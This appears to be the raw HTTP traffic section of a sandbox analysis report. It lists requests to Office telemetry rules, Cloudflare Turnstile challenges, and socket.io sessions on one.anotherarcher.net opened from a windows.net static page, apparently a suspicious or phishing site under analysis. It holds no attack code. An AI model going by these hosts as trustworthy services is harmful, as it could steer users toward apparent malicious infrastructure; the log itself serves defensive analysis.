Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1068987029:1727987361:H48Ca4K2cE6wqNiPcZ10Ac4maIt3-zGdX4bbIzz4o_A/8ccfd8e9a8628cba/ad3a50ee52cf40e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBDYg&sid=PxklD2APRIAoLrLiAANp HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBDYw&sid=PxklD2APRIAoLrLiAANp HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd9137e0f3342&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/swj1h/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd8e9a8628cba/1727989079444/hYYFsUQiuKDr-sN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/oijse/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBDvc&sid=PxklD2APRIAoLrLiAANp HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd8e9a8628cba/1727989079444/hYYFsUQiuKDr-sN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd9137e0f3342&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBEhx HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd9137e0f3342/1727989083865/rDgMWQo3cWqGs8o HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/swj1h/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/136349667:1727987345:YIwZHJwwHqPIcBZYWS-e5MClYzwtIJxGEVjRi2T8QKc/8ccfd9137e0f3342/9e9502dfa807b91 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBEhx HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBE_u&sid=9cPRcNrvQ6_PXkdbAANs HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=9cPRcNrvQ6_PXkdbAANs HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: eltFXDRpzsKKsGUhaDCuNg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1068987029:1727987361:H48Ca4K2cE6wqNiPcZ10Ac4maIt3-zGdX4bbIzz4o_A/8ccfd8e9a8628cba/ad3a50ee52cf40e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uzg9m/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccfd9137e0f3342/1727989083867/a57cf04f5d234c896d5557f67b34d71436f803aa4d53d91c91127c14611fe720/kpWTz49GNy7ZQk2 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/swj1h/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd9137e0f3342/1727989083865/rDgMWQo3cWqGs8o HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBFI1&sid=9cPRcNrvQ6_PXkdbAANs HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBE_t&sid=9cPRcNrvQ6_PXkdbAANs HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBE_u&sid=9cPRcNrvQ6_PXkdbAANs HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd93368b41996&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uzg9m/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBFI1&sid=9cPRcNrvQ6_PXkdbAANs HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBFtN HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/136349667:1727987345:YIwZHJwwHqPIcBZYWS-e5MClYzwtIJxGEVjRi2T8QKc/8ccfd9137e0f3342/9e9502dfa807b91 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd93368b41996&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/687507771:1727987450:jxf_mcxDVQ0QXXYkXbNZiukg_OB_AtvnOk_Sj49H5RI/8ccfd93368b41996/2529022dc1e7737 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBG8u&sid=sEYXozu9UpbVjsuFAANv HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBFtN HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=sEYXozu9UpbVjsuFAANv HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 0lJLCjQ0VXjAizJ0Ri3QiQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
